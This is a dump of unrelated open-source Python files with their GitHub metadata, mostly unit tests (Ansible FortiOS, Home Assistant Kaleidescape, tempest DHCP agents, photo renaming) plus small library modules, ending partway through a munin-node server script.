"content_hash": "0e8bf0168b06c88db1b3cf1d7cdacf69",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 97,
"avg_line_length": 26.692307692307693,
"alnum_prop": 0.638328530259366,
"repo_name": "mobarski/sandbox",
"id": "ef9fdddd93593ac9d4aae92fcc03acdebf268a50",
"size": "694",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "covid19/data/test_meta.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "862"
},
{
"name": "CSS",
"bytes": "6757"
},
{
"name": "Go",
"bytes": "2645"
},
{
"name": "HTML",
"bytes": "637936"
},
{
"name": "JavaScript",
"bytes": "23025"
},
{
"name": "Jupyter Notebook",
"bytes": "57502"
},
{
"name": "Lua",
"bytes": "549110"
},
{
"name": "Makefile",
"bytes": "580"
},
{
"name": "Python",
"bytes": "1329224"
},
{
"name": "Roff",
"bytes": "561"
}
],
"symlink_target": ""
} |
import ntpath
import sys
from unittest import TestCase
from exifread import IfdTag
from mock import mock
from pictures.rename import rename
from tests import helpers
def ifd_tag_from(date_time_original):
return IfdTag(None, None, None, date_time_original, None, None)
class MockFile(object):
def __init__(self, filename, mode):
self.filename = filename
self.mode = mode
def __enter__(self):
return self
def __exit__(self, *args):
pass
def create_mock_process_file(files):
return lambda f_mock: files[f_mock.filename]
def create_mock_isfile(files):
return lambda f: f in files
class TestRename(TestCase):
FILES = {
r'C:\dir\no_exif_tags.jpeg': {},
r'C:\dir\timestamp_does_not_exist.jpeg': {'EXIF DateTimeOriginal': ifd_tag_from('2016:10:29 15:43:56')}, # 1 check
r'C:\dir\timestamp_does_exist.jpeg': {'EXIF DateTimeOriginal': ifd_tag_from('2016:02:04 12:03:35')}, # 2 checks
r'C:\dir\20160204_120335.jpeg': {'EXIF DateTimeOriginal': ifd_tag_from('2016:02:04 12:03:35')},
r'C:\dir\timestamp_does_exist_multiple.jpeg': {'EXIF DateTimeOriginal': ifd_tag_from('2017:01:03 14:23:45')}, # 4 checks
r'C:\dir\20170103_142345.jpeg': {'EXIF DateTimeOriginal': ifd_tag_from('2017:01:03 14:23:45')},
r'C:\dir\20170103_142345_1.jpeg': {'EXIF DateTimeOriginal': ifd_tag_from('2017:01:03 14:23:45')},
r'C:\dir\20170103_142345_2.jpeg': {'EXIF DateTimeOriginal': ifd_tag_from('2017:01:03 14:23:45')}
}
@mock.patch('os.rename')
@mock.patch('exifread.process_file', side_effect=create_mock_process_file(FILES))
@mock.patch('builtins.open' if sys.version_info[0] >= 3 else '__builtin__.open', side_effect=MockFile)
@mock.patch('os.path.isfile', create_mock_isfile(FILES))
@mock.patch('os.path', ntpath)
def test_rename(self, mock_open, mock_process_file, mock_rename):
rename(self.FILES)
self.assertEquals(mock_open.mock_calls, helpers.calls_from(zip(self.FILES.keys(), ['rb'] * len(self.FILES))))
self.assertEquals(mock_process_file.call_count, len(self.FILES))
self.assertEquals(sorted(mock_rename.mock_calls), sorted(helpers.calls_from([
(r'C:\dir\timestamp_does_not_exist.jpeg', r'C:\dir\20161029_154356.jpeg'),
(r'C:\dir\timestamp_does_exist.jpeg', r'C:\dir\20160204_120335_1.jpeg'),
(r'C:\dir\timestamp_does_exist_multiple.jpeg', r'C:\dir\20170103_142345_3.jpeg')
])))
| {
"content_hash": "efa2fc4b9447b9b175f0111a5f7b7cd6",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 129,
"avg_line_length": 38.52307692307692,
"alnum_prop": 0.6553514376996805,
"repo_name": "mina-asham/pictures-dedupe-and-rename",
"id": "fe6295126fdb425934c20d5aaf75706fdea94858",
"size": "2504",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_rename.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "9416"
}
],
"symlink_target": ""
} |
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_user_device_group
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_user_device_group.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_user_device_group_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_device_group': {
'comment': 'Comment.',
'name': 'default_name_4',
},
'vdom': 'root'}
is_error, changed, response = fortios_user_device_group.fortios_user(input_data, fos_instance)
expected_data = {
'comment': 'Comment.',
'name': 'default_name_4',
}
set_method_mock.assert_called_with('user', 'device-group', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_user_device_group_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_device_group': {
'comment': 'Comment.',
'name': 'default_name_4',
},
'vdom': 'root'}
is_error, changed, response = fortios_user_device_group.fortios_user(input_data, fos_instance)
expected_data = {
'comment': 'Comment.',
'name': 'default_name_4',
}
set_method_mock.assert_called_with('user', 'device-group', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_user_device_group_removal(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'user_device_group': {
'comment': 'Comment.',
'name': 'default_name_4',
},
'vdom': 'root'}
is_error, changed, response = fortios_user_device_group.fortios_user(input_data, fos_instance)
delete_method_mock.assert_called_with('user', 'device-group', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_user_device_group_deletion_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'user_device_group': {
'comment': 'Comment.',
'name': 'default_name_4',
},
'vdom': 'root'}
is_error, changed, response = fortios_user_device_group.fortios_user(input_data, fos_instance)
delete_method_mock.assert_called_with('user', 'device-group', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_user_device_group_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_device_group': {
'comment': 'Comment.',
'name': 'default_name_4',
},
'vdom': 'root'}
is_error, changed, response = fortios_user_device_group.fortios_user(input_data, fos_instance)
expected_data = {
'comment': 'Comment.',
'name': 'default_name_4',
}
set_method_mock.assert_called_with('user', 'device-group', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_user_device_group_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_device_group': {
'random_attribute_not_valid': 'tag',
'comment': 'Comment.',
'name': 'default_name_4',
},
'vdom': 'root'}
is_error, changed, response = fortios_user_device_group.fortios_user(input_data, fos_instance)
expected_data = {
'comment': 'Comment.',
'name': 'default_name_4',
}
set_method_mock.assert_called_with('user', 'device-group', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
| {
"content_hash": "65c589f78cf64cc46338af3fc10d3078",
"timestamp": "",
"source": "github",
"line_count": 203,
"max_line_length": 142,
"avg_line_length": 34.02463054187192,
"alnum_prop": 0.6525264224699581,
"repo_name": "thaim/ansible",
"id": "c5f79f6c4c98633e5472e6f21dead9a8f0399c97",
"size": "7603",
"binary": false,
"copies": "20",
"ref": "refs/heads/fix-broken-link",
"path": "test/units/modules/network/fortios/test_fortios_user_device_group.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7"
},
{
"name": "Shell",
"bytes": "246"
}
],
"symlink_target": ""
} |
"""Tests for Kaleidescape config flow."""
import dataclasses
from unittest.mock import AsyncMock
from homeassistant.components.kaleidescape.const import DOMAIN
from homeassistant.config_entries import SOURCE_SSDP, SOURCE_USER
from homeassistant.const import CONF_HOST
from homeassistant.core import HomeAssistant
from homeassistant.data_entry_flow import FlowResultType
from . import MOCK_HOST, MOCK_SSDP_DISCOVERY_INFO
from tests.common import MockConfigEntry
async def test_user_config_flow_success(
hass: HomeAssistant, mock_device: AsyncMock
) -> None:
"""Test user config flow success."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}
)
assert result["type"] == FlowResultType.FORM
assert result["step_id"] == "user"
result = await hass.config_entries.flow.async_configure(
result["flow_id"], user_input={CONF_HOST: MOCK_HOST}
)
await hass.async_block_till_done()
assert result["type"] == FlowResultType.CREATE_ENTRY
assert "data" in result
assert result["data"][CONF_HOST] == MOCK_HOST
async def test_user_config_flow_bad_connect_errors(
hass: HomeAssistant, mock_device: AsyncMock
) -> None:
"""Test errors when connection error occurs."""
mock_device.connect.side_effect = ConnectionError
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}, data={CONF_HOST: MOCK_HOST}
)
assert result["type"] == FlowResultType.FORM
assert result["step_id"] == "user"
assert result["errors"] == {"base": "cannot_connect"}
async def test_user_config_flow_unsupported_device_errors(
hass: HomeAssistant, mock_device: AsyncMock
) -> None:
"""Test errors when connecting to unsupported device."""
mock_device.is_server_only = True
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}, data={CONF_HOST: MOCK_HOST}
)
assert result["type"] == FlowResultType.FORM
assert result["step_id"] == "user"
assert result["errors"] == {"base": "unsupported"}
async def test_user_config_flow_device_exists_abort(
hass: HomeAssistant, mock_device: AsyncMock, mock_integration: MockConfigEntry
) -> None:
"""Test flow aborts when device already configured."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}, data={CONF_HOST: MOCK_HOST}
)
assert result["type"] == FlowResultType.ABORT
assert result["reason"] == "already_configured"
async def test_ssdp_config_flow_success(
hass: HomeAssistant, mock_device: AsyncMock
) -> None:
"""Test ssdp config flow success."""
discovery_info = dataclasses.replace(MOCK_SSDP_DISCOVERY_INFO)
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_SSDP}, data=discovery_info
)
assert result["type"] == FlowResultType.FORM
assert result["step_id"] == "discovery_confirm"
result = await hass.config_entries.flow.async_configure(
result["flow_id"], user_input={}
)
await hass.async_block_till_done()
assert result["type"] == FlowResultType.CREATE_ENTRY
assert "data" in result
assert result["data"][CONF_HOST] == MOCK_HOST
async def test_ssdp_config_flow_bad_connect_aborts(
hass: HomeAssistant, mock_device: AsyncMock
) -> None:
"""Test abort when connection error occurs."""
mock_device.connect.side_effect = ConnectionError
discovery_info = dataclasses.replace(MOCK_SSDP_DISCOVERY_INFO)
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_SSDP}, data=discovery_info
)
assert result["type"] == FlowResultType.ABORT
assert result["reason"] == "cannot_connect"
async def test_ssdp_config_flow_unsupported_device_aborts(
hass: HomeAssistant, mock_device: AsyncMock
) -> None:
"""Test abort when connecting to unsupported device."""
mock_device.is_server_only = True
discovery_info = dataclasses.replace(MOCK_SSDP_DISCOVERY_INFO)
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_SSDP}, data=discovery_info
)
assert result["type"] == FlowResultType.ABORT
assert result["reason"] == "unsupported"
| {
"content_hash": "9de7319e2de7d256f5f4d2a3616045f1",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 82,
"avg_line_length": 34.30952380952381,
"alnum_prop": 0.6985889428637521,
"repo_name": "w1ll1am23/home-assistant",
"id": "8171ed0955bb47a829fdd227153fe2db48fc75cd",
"size": "4323",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "tests/components/kaleidescape/test_config_flow.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2963"
},
{
"name": "PLSQL",
"bytes": "840"
},
{
"name": "Python",
"bytes": "52277012"
},
{
"name": "Shell",
"bytes": "6252"
}
],
"symlink_target": ""
} |
import copy
from . wrapper import Wrapper
from .. util import color_list
class Feedback(Wrapper):
def __init__(self, *args, animation,
master=1, inputs=None, outputs=None, **kwds):
super().__init__(*args, animation=animation, **kwds)
self.master = master
inputs = inputs or [0]
outputs = outputs or []
in_sources = [copy.deepcopy(self.color_list) for i in inputs[1:]]
in_sources.insert(self.animation.color_list)
out_sources = [copy.deepcopy(self.color_list) for i in outputs]
self.inputs = color_list.Mixer(self.color_list, in_sources, inputs)
self.outputs = color_list.Mixer(self.color_list, out_sources, outputs)
self.clear = self.inputs.clear
self.math = self.inputs.math
def step(self, amt=1):
super().step(amt=amt)
self.clear()
self.inputs.mix(self.master)
self.outputs.mix(self.master)
def rotate(sources, begin):
if len(sources) > 1 + begin:
sources.insert(begin, sources.pop())
ins, outs = self.inputs.sources, self.outputs.sources
rotate(ins, 1)
rotate(outs, 0)
if len(ins) > 1:
self.math.copy(ins[1], ins[0])
if len(outs) > 0:
self.math.copy(outs[0], self.color_list)
| {
"content_hash": "ca2e87a46660a952a661d86d9aa1b7b1",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 78,
"avg_line_length": 29.08695652173913,
"alnum_prop": 0.5866965620328849,
"repo_name": "rec/BiblioPixel",
"id": "d78a71ef5fd1d9f16be29a9d9868726b46cda8f5",
"size": "1338",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "bibliopixel/animation/feedback.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "20651"
},
{
"name": "HTML",
"bytes": "3310"
},
{
"name": "JavaScript",
"bytes": "5140"
},
{
"name": "Python",
"bytes": "673520"
},
{
"name": "Shell",
"bytes": "2973"
}
],
"symlink_target": ""
} |
"""
WSGI config for {{ project_name }} project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/{{ docs_version }}/howto/deployment/wsgi/
"""
from __future__ import absolute_import, unicode_literals
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "{{ project_name }}.settings.dev")
application = get_wsgi_application()
| {
"content_hash": "82be1ebd3861d6689feab0b85eed4697",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 82,
"avg_line_length": 27.22222222222222,
"alnum_prop": 0.746938775510204,
"repo_name": "nilnvoid/wagtail",
"id": "f58f6b154cd83f53b14b37d743094191dec4e768",
"size": "490",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "wagtail/project_template/project_name/wsgi.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "172932"
},
{
"name": "HTML",
"bytes": "291232"
},
{
"name": "JavaScript",
"bytes": "116614"
},
{
"name": "Makefile",
"bytes": "548"
},
{
"name": "Python",
"bytes": "2253627"
},
{
"name": "Shell",
"bytes": "7387"
}
],
"symlink_target": ""
} |
from tempest.api.network import base
from tempest import test
class DHCPAgentSchedulersTestJSON(base.BaseAdminNetworkTest):
_interface = 'json'
@classmethod
@test.safe_setup
def setUpClass(cls):
super(DHCPAgentSchedulersTestJSON, cls).setUpClass()
if not test.is_extension_enabled('dhcp_agent_scheduler', 'network'):
msg = "dhcp_agent_scheduler extension not enabled."
raise cls.skipException(msg)
# Create a network and make sure it will be hosted by a
# dhcp agent: this is done by creating a regular port
cls.network = cls.create_network()
cls.subnet = cls.create_subnet(cls.network)
cls.cidr = cls.subnet['cidr']
cls.port = cls.create_port(cls.network)
@test.attr(type='smoke')
def test_list_dhcp_agent_hosting_network(self):
_, body = self.admin_client.list_dhcp_agent_hosting_network(
self.network['id'])
@test.attr(type='smoke')
def test_list_networks_hosted_by_one_dhcp(self):
resp, body = self.admin_client.list_dhcp_agent_hosting_network(
self.network['id'])
agents = body['agents']
self.assertIsNotNone(agents)
agent = agents[0]
self.assertTrue(self._check_network_in_dhcp_agent(
self.network['id'], agent))
def _check_network_in_dhcp_agent(self, network_id, agent):
network_ids = []
_, body = self.admin_client.list_networks_hosted_by_one_dhcp_agent(
agent['id'])
networks = body['networks']
for network in networks:
network_ids.append(network['id'])
return network_id in network_ids
@test.attr(type='smoke')
def test_add_remove_network_from_dhcp_agent(self):
# The agent is now bound to the network, we can free the port
self.client.delete_port(self.port['id'])
self.ports.remove(self.port)
agent = dict()
agent['agent_type'] = None
resp, body = self.admin_client.list_agents()
agents = body['agents']
for a in agents:
if a['agent_type'] == 'DHCP agent':
agent = a
break
self.assertEqual(agent['agent_type'], 'DHCP agent', 'Could not find '
'DHCP agent in agent list though dhcp_agent_scheduler'
' is enabled.')
network = self.create_network()
network_id = network['id']
if self._check_network_in_dhcp_agent(network_id, agent):
self._remove_network_from_dhcp_agent(network_id, agent)
self._add_dhcp_agent_to_network(network_id, agent)
else:
self._add_dhcp_agent_to_network(network_id, agent)
self._remove_network_from_dhcp_agent(network_id, agent)
def _remove_network_from_dhcp_agent(self, network_id, agent):
_, body = self.admin_client.remove_network_from_dhcp_agent(
agent_id=agent['id'],
network_id=network_id)
self.assertFalse(self._check_network_in_dhcp_agent(
network_id, agent))
def _add_dhcp_agent_to_network(self, network_id, agent):
_, body = self.admin_client.add_dhcp_agent_to_network(agent['id'],
network_id)
self.assertTrue(self._check_network_in_dhcp_agent(
network_id, agent))
class DHCPAgentSchedulersTestXML(DHCPAgentSchedulersTestJSON):
_interface = 'xml'
| {
"content_hash": "0304044a7fbda7546fde02c01ec6f2c8",
"timestamp": "",
"source": "github",
"line_count": 86,
"max_line_length": 79,
"avg_line_length": 40.46511627906977,
"alnum_prop": 0.603448275862069,
"repo_name": "cloudbase/lis-tempest",
"id": "c84d1a7c36f73ed78d1b5dd674df3ede1312e199",
"size": "4082",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tempest/api/network/admin/test_dhcp_agent_scheduler.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3377111"
},
{
"name": "Shell",
"bytes": "8663"
}
],
"symlink_target": ""
} |
__author__ = 'Ahmad Syarif'
import pika
import json
class CommandHandler(object):
avatarKey = 'avatar.NAO.command'
def __init__(self):
credential = pika.PlainCredentials('lumen', 'lumen')
connection = pika.BlockingConnection(pika.ConnectionParameters('localhost', 5672, '/', credential))
self.channel = connection.channel()
pass
def sendCommand(self,command):
self.channel.basic_publish(exchange='amq.topic',routing_key=CommandHandler.avatarKey,body=command)
pass
def LS_say(self,toSay):
par = json.dumps({'text':toSay})
com = json.dumps({'type':'texttospeech','method':'say','parameter':{'text':toSay}})
self.sendCommand(command=com)
pass
def LS_goToPosture(self,posture,speed):
com = json.dumps({'type':'posture','method':'goToPosture','parameter':{'postureName':posture,'speed':speed}})
self.sendCommand(command=com)
pass
def LS_wakeUp(self):
com = json.dumps({'type':'motion','method':'wakeUp'})
self.sendCommand(command=com)
pass
def LS_rest(self):
com = json.dumps({'type':'motion','method':'rest'})
self.sendCommand(command=com)
pass
pass
| {
"content_hash": "bc1185d9d7dbacf1bf2d8df4bbecd0c6",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 117,
"avg_line_length": 39.67741935483871,
"alnum_prop": 0.6317073170731707,
"repo_name": "ahmadsyarif/Python-AgentIntelligent",
"id": "355866df24e63e98aeaccb91f7515367689c943a",
"size": "1230",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Command.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "12204"
}
],
"symlink_target": ""
} |
from hypr import Provider, request, filter
import json
class BaseProvider(Provider):
def get(self):
return request.m_filters
class Provider0(BaseProvider):
propagation_rules = {
'rule0': (BaseProvider, '/bar')
}
@filter
def my_filter(self):
return 'ok'
class TestFilter:
providers = {
Provider0: '/foo',
}
def test_sanity(self, app):
with app.test_client() as client:
resp = client.get('/foo')
assert resp.status == 200
assert json.loads(resp.text) == {}
def test_filter_is_applied(self, app):
with app.test_client() as client:
resp = client.get('/foo/bar')
assert resp.status == 200
assert json.loads(resp.text) == {'my_filter': 'ok'}
| {
"content_hash": "d98121e5de458678cb5fa01c8da31097",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 63,
"avg_line_length": 21.157894736842106,
"alnum_prop": 0.5671641791044776,
"repo_name": "project-hypr/hypr",
"id": "2e3c7cd3e88353ac73a3793a88b1537cccf41a8b",
"size": "804",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/security/filters/test_simple_filter.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "144944"
}
],
"symlink_target": ""
} |
"""Behaviors for servicing RPCs."""
# base_interfaces and interfaces are referenced from specification in this
# module.
from grpc.framework.base import interfaces as base_interfaces # pylint: disable=unused-import
from grpc.framework.face import _control
from grpc.framework.face import exceptions
from grpc.framework.face import interfaces # pylint: disable=unused-import
from grpc.framework.foundation import abandonment
from grpc.framework.foundation import callable_util
from grpc.framework.foundation import stream
from grpc.framework.foundation import stream_util
class _ValueInStreamOutConsumer(stream.Consumer):
"""A stream.Consumer that maps inputs one-to-many onto outputs."""
def __init__(self, behavior, context, downstream):
"""Constructor.
Args:
behavior: A callable that takes a single value and an
interfaces.RpcContext and returns a generator of arbitrarily many
values.
context: An interfaces.RpcContext.
downstream: A stream.Consumer to which to pass the values generated by the
given behavior.
"""
self._behavior = behavior
self._context = context
self._downstream = downstream
def consume(self, value):
_control.pipe_iterator_to_consumer(
self._behavior(value, self._context), self._downstream,
self._context.is_active, False)
def terminate(self):
self._downstream.terminate()
def consume_and_terminate(self, value):
_control.pipe_iterator_to_consumer(
self._behavior(value, self._context), self._downstream,
self._context.is_active, True)
def _pool_wrap(behavior, operation_context):
"""Wraps an operation-related behavior so that it may be called in a pool.
Args:
behavior: A callable related to carrying out an operation.
operation_context: A base_interfaces.OperationContext for the operation.
Returns:
A callable that when called carries out the behavior of the given callable
and handles whatever exceptions it raises appropriately.
"""
def translation(*args):
try:
behavior(*args)
except (
abandonment.Abandoned,
exceptions.ExpirationError,
exceptions.CancellationError,
exceptions.ServicedError,
exceptions.NetworkError) as e:
if operation_context.is_active():
operation_context.fail(e)
except Exception as e:
operation_context.fail(e)
return callable_util.with_exceptions_logged(
translation, _control.INTERNAL_ERROR_LOG_MESSAGE)
def adapt_inline_value_in_value_out(method):
def adaptation(response_consumer, operation_context):
rpc_context = _control.RpcContext(operation_context)
return stream_util.TransformingConsumer(
lambda request: method.service(request, rpc_context), response_consumer)
return adaptation
def adapt_inline_value_in_stream_out(method):
def adaptation(response_consumer, operation_context):
rpc_context = _control.RpcContext(operation_context)
return _ValueInStreamOutConsumer(
method.service, rpc_context, response_consumer)
return adaptation
def adapt_inline_stream_in_value_out(method, pool):
def adaptation(response_consumer, operation_context):
rendezvous = _control.Rendezvous()
operation_context.add_termination_callback(rendezvous.set_outcome)
def in_pool_thread():
response_consumer.consume_and_terminate(
method.service(rendezvous, _control.RpcContext(operation_context)))
pool.submit(_pool_wrap(in_pool_thread, operation_context))
return rendezvous
return adaptation
def adapt_inline_stream_in_stream_out(method, pool):
"""Adapts an interfaces.InlineStreamInStreamOutMethod for use with Consumers.
RPCs may be serviced by calling the return value of this function, passing
request values to the stream.Consumer returned from that call, and receiving
response values from the stream.Consumer passed to that call.
Args:
method: An interfaces.InlineStreamInStreamOutMethod.
pool: A thread pool.
Returns:
A callable that takes a stream.Consumer and a
base_interfaces.OperationContext and returns a stream.Consumer.
"""
def adaptation(response_consumer, operation_context):
rendezvous = _control.Rendezvous()
operation_context.add_termination_callback(rendezvous.set_outcome)
def in_pool_thread():
_control.pipe_iterator_to_consumer(
method.service(rendezvous, _control.RpcContext(operation_context)),
response_consumer, operation_context.is_active, True)
pool.submit(_pool_wrap(in_pool_thread, operation_context))
return rendezvous
return adaptation
def adapt_event_value_in_value_out(method):
def adaptation(response_consumer, operation_context):
def on_payload(payload):
method.service(
payload, response_consumer.consume_and_terminate,
_control.RpcContext(operation_context))
return _control.UnaryConsumer(on_payload)
return adaptation
def adapt_event_value_in_stream_out(method):
def adaptation(response_consumer, operation_context):
def on_payload(payload):
method.service(
payload, response_consumer, _control.RpcContext(operation_context))
return _control.UnaryConsumer(on_payload)
return adaptation
def adapt_event_stream_in_value_out(method):
def adaptation(response_consumer, operation_context):
rpc_context = _control.RpcContext(operation_context)
return method.service(response_consumer.consume_and_terminate, rpc_context)
return adaptation
def adapt_event_stream_in_stream_out(method):
def adaptation(response_consumer, operation_context):
return method.service(
response_consumer, _control.RpcContext(operation_context))
return adaptation
| {
"content_hash": "f8287d8dfc0cf9cd5d5718111882f2e3",
"timestamp": "",
"source": "github",
"line_count": 160,
"max_line_length": 94,
"avg_line_length": 35.875,
"alnum_prop": 0.7381533101045297,
"repo_name": "nmittler/grpc",
"id": "26bde129687a5b48b6bb7ad849665b10ab19e722",
"size": "7269",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "src/python/src/grpc/framework/face/_service.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "3067591"
},
{
"name": "C#",
"bytes": "384252"
},
{
"name": "C++",
"bytes": "499254"
},
{
"name": "JavaScript",
"bytes": "135884"
},
{
"name": "Makefile",
"bytes": "1105184"
},
{
"name": "Objective-C",
"bytes": "145264"
},
{
"name": "PHP",
"bytes": "100749"
},
{
"name": "Protocol Buffer",
"bytes": "133189"
},
{
"name": "Python",
"bytes": "649840"
},
{
"name": "Ruby",
"bytes": "291726"
},
{
"name": "Shell",
"bytes": "17838"
}
],
"symlink_target": ""
} |
import os
import socket
import SocketServer
import sys
import threading
import time
from subprocess import Popen, PIPE
PLUGIN_PATH = "/etc/munin/plugins"
def parse_args():
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-p", "--pluginpath", dest="plugin_path",
help="path to plugins", default=PLUGIN_PATH)
(options, args) = parser.parse_args()
return options, args
def execute_plugin(path, cmd=""):
args = [path]
if cmd:
args.append(cmd)
p = Popen(args, stdout=PIPE)
output = p.communicate()[0]
return output
if os.name == 'posix':
def become_daemon(our_home_dir='.', out_log='/dev/null',
err_log='/dev/null', umask=022):
"Robustly turn into a UNIX daemon, running in our_home_dir."
# First fork
try:
if os.fork() > 0:
sys.exit(0) # kill off parent
except OSError, e:
sys.stderr.write("fork #1 failed: (%d) %s\n" % (e.errno, e.strerror))
sys.exit(1)
os.setsid()
os.chdir(our_home_dir)
os.umask(umask)
# Second fork
try:
if os.fork() > 0:
os._exit(0)
except OSError, e:
sys.stderr.write("fork #2 failed: (%d) %s\n" % (e.errno, e.strerror))
os._exit(1)
si = open('/dev/null', 'r')
so = open(out_log, 'a+', 0)
se = open(err_log, 'a+', 0)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
# Set custom file descriptors so that they get proper buffering.
sys.stdout, sys.stderr = so, se
else:
def become_daemon(our_home_dir='.', out_log=None, err_log=None, umask=022):
"""
If we're not running under a POSIX system, just simulate the daemon
mode by doing redirections and directory changing.
"""
os.chdir(our_home_dir)
os.umask(umask)
sys.stdin.close()
sys.stdout.close()
sys.stderr.close()
if err_log:
sys.stderr = open(err_log, 'a', 0)
else:
sys.stderr = NullDevice()
if out_log:
sys.stdout = open(out_log, 'a', 0)
else:
sys.stdout = NullDevice()
class NullDevice:
"A writeable object that writes to nowhere -- like /dev/null."
def write(self, s):
pass
class MuninRequestHandler(SocketServer.StreamRequestHandler):
def handle(self):
# self.rfile is a file-like object created by the handler;
# we can now use e.g. readline() instead of raw recv() calls
plugins = []
for x in os.listdir(self.server.options.plugin_path):
if x.startswith('.'):
continue
fullpath = os.path.join(self.server.options.plugin_path, x)
if not os.path.isfile(fullpath):
continue
plugins.append(x)
node_name = socket.gethostname().split('.')[0]
self.wfile.write("# munin node at %s\n" % node_name)
while True:
line = self.rfile.readline()
if not line:
break
line = line.strip()
cmd = line.split(' ', 1)
plugin = (len(cmd) > 1) and cmd[1] or None
if cmd[0] == "list":
